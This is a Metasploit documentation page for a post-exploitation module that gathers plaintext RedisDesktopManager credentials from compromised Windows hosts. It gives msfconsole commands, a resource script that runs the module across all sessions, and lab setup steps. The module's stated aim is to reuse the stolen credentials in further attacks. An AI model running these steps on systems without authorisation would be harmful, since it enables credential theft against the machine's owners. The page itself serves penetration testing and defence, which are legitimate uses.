RedisDesktopManager credential gatherer - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/redis_desktop_manager metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: RedisDesktopManager credential gatherer
Module: post/windows/gather/credentials/redis_desktop_manager
Source code: modules/post/windows/gather/credentials/redis_desktop_manager.rb
Disclosure date: -
Last modification time: 2022-09-14 17:03:42 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems. PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries. Further details can be found in the module documentation. This is a module that searches for RedisDesktopManager credentials on a windows remote host.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/redis_desktop_manager

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/redis_desktop_manager
msf post(redis_desktop_manager) > show options
    ... show and set options ...
msf post(redis_desktop_manager) > set SESSION session-id
msf post(redis_desktop_manager) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/redis_desktop_manager")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on

Knowledge Base

Vulnerable Application

RedisDesktopManager stores its credentials in a JSON file in plaintext. This module allow users who have successfully compromised a machine running RedisDesktopManager to extract these credentials from the compromised system so that they can be reused for future attacks or for password analysis.

Setup Steps

  1. Download the latest installer of RedisdDesktopManager from https://github.com/uglide/RedisDesktopManager/releases. However you need to be subscribed to be able to run these editions. Therefore it is recommended that you download the Windows version from https://github.com/lework/RedisDesktopManager-Windows/releases and use these for testing if you don't have an existing Redis subscription.
  2. Run the installer, follow the prompts, and select all the default settings.
  3. Once everything has been installed, start RedisDesktopManager and click on Connect To Redis Server.
  4. Click OK after filling in the connection information, including the username and password to log into the Redis server as.

Verification Steps

  1. msfconsole
  2. Get a Meterpreter session on a Windows system
  3. use post/windows/gather/credentials/redis_desktop_manager
  4. set SESSION <session number of the Meterpreter session>
  5. run
  6. Verify that the module was able to extract the connection credentials you entered during the Setup Steps phrase.

Options

REGEX

Users can set their own regular expressions that will be utilized to determine which credentials to extract. The default is set to ^password.

VERBOSE

By default this option is turned off. When turned on, the module will show information on files which aren't extracted and information that is not directly related to the artifact output.

STORE_LOOT

This option is turned on by default and will cause the module to save the stolen artifacts/files to the loot files on the machine running Metasploit. This is required for extracting credentials from files using regexp, JSON, XML, and SQLite queries.

EXTRACT_DATA

This option is turned on by default and will perform the data extraction using the predefined regular expression. The STORE_LOOT option must be turned on in order for this to work.

Scenarios

Go back to menu.

Msfconsole Usage

Here is how the windows/gather/credentials/redis_desktop_manager post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/redis_desktop_manager

msf6 post(windows/gather/credentials/redis_desktop_manager) > show info

       Name: RedisDesktopManager credential gatherer
     Module: post/windows/gather/credentials/redis_desktop_manager
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Kali-Team

Module stability:
 crash-safe

Compatible session types:
  Meterpreter

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  ARTIFACTS     All              no        Type of artifacts to collect (Accepted: All, logins)
  EXTRACT_DATA  true             no        Extract data and stores in a separate file
  REGEX         ^password        no        Match a regular expression
  SESSION                        yes       The session to run this module on
  STORE_LOOT    true             no        Store artifacts into loot database

Description:
  PackRat is a post-exploitation module that gathers file and 
  information artifacts from end users' systems. PackRat searches for 
  and downloads files of interest (such as config files, and received 
  and deleted emails) and extracts information (such as contacts and 
  usernames and passwords), using regexp, JSON, XML, and SQLite 
  queries. Further details can be found in the module documentation. 
  This is a module that searches for RedisDesktopManager credentials 
  on a windows remote host.

References:
  https://blog.kali-team.cn/Metasploit-PackRat-RedisDesktopManager-42dc7ab063f040d182da0f1fc16db74e

Module Options

This is a complete list of options available in the windows/gather/credentials/redis_desktop_manager post exploitation module:

msf6 post(windows/gather/credentials/redis_desktop_manager) > show options

Module options (post/windows/gather/credentials/redis_desktop_manager):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ARTIFACTS     All              no        Type of artifacts to collect (Accepted: All, logins)
   EXTRACT_DATA  true             no        Extract data and stores in a separate file
   REGEX         ^password        no        Match a regular expression
   SESSION                        yes       The session to run this module on
   STORE_LOOT    true             no        Store artifacts into loot database

Advanced Options

Here is a complete list of advanced options supported by the windows/gather/credentials/redis_desktop_manager post exploitation module:

msf6 post(windows/gather/credentials/redis_desktop_manager) > show advanced

Module advanced options (post/windows/gather/credentials/redis_desktop_manager):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the windows/gather/credentials/redis_desktop_manager module can do:

msf6 post(windows/gather/credentials/redis_desktop_manager) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the windows/gather/credentials/redis_desktop_manager post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/redis_desktop_manager) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • Kali-Team

Version

This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.